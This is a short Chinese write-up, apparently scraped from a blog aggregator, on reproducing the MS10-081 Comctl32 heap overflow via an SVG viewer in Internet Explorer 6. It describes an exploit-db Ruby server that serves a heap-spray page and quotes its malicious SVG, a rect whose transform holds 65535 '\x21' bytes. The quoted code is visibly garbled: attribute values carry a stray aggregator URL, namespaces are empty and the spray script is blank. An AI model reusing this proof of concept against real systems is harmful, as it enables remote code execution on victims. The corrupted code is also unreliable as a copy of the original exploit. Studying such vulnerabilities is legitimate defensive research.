Common Control Library (Comctl32) Heap Overflow (MS10

　　　　exploit-db：https://www.exploit-db.com/exploits/15963/

　　　　微软安全公告：https://technet.microsoft.com/library/security/ms10-081

漏洞介绍：

　　　　根据微软官方说明，漏洞的原因是在使用第三方可伸缩矢量图形 (SVG) 查看器时，Windows 公共控件库Comctl32.dll 没有正确处理某些消息存在一个远程执行代码漏洞，且说明了是一个堆溢出漏洞。

环境介绍：

　　　　(1) XP Professional sp 3 (2) Internet Explorer 6.0.2900.5512 (3) ruby1.9 (4) IE8及以下不支持svg，需要安装SVGVIEW

漏洞重现：

　　　　下载exploit-db提供下载的ruby脚本。执行脚本会监听55555端口，访问后会返回一个html页面，包含了堆喷射的js和iframe嵌套svg，svg文件中定义了一个矩形，这个矩形的 transform 属性有一个异常的值 65535个"\x21"，脚本主要内容如下：

transform_name = "\x21" * 65535 svg = <<-SVG <?xml version=http://www.mamicode.com/"1.0"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""> <svg xmlns=http://www.mamicode.com/"" xmlns:xlink=http://www.mamicode.com/""> <rect x=http://www.mamicode.com/"50" y=http://www.mamicode.com/"50" height=http://www.mamicode.com/"110" width=http://www.mamicode.com/"110" style=http://www.mamicode.com/"fill: #ffffff" transform=http://www.mamicode.com/"#{transform_name}(10) translate(30) rotate(45 50 50)" > </rect> <text x=http://www.mamicode.com/"100" y=http://www.mamicode.com/"100">CLICK ME</text> </svg> SVG html = <<-HTML <html> <body> <script>  </script> <iframe width=http://www.mamicode.com/"100%" height=http://www.mamicode.com/"100%" src=http://www.mamicode.com/"poc.svg" marginheight=http://www.mamicode.com/"0" marginwidth=http://www.mamicode.com/"0"></iframe> </body> </html> HTML

秒客网

Common Control Library (Comctl32) Heap Overflow (MS10

相关文章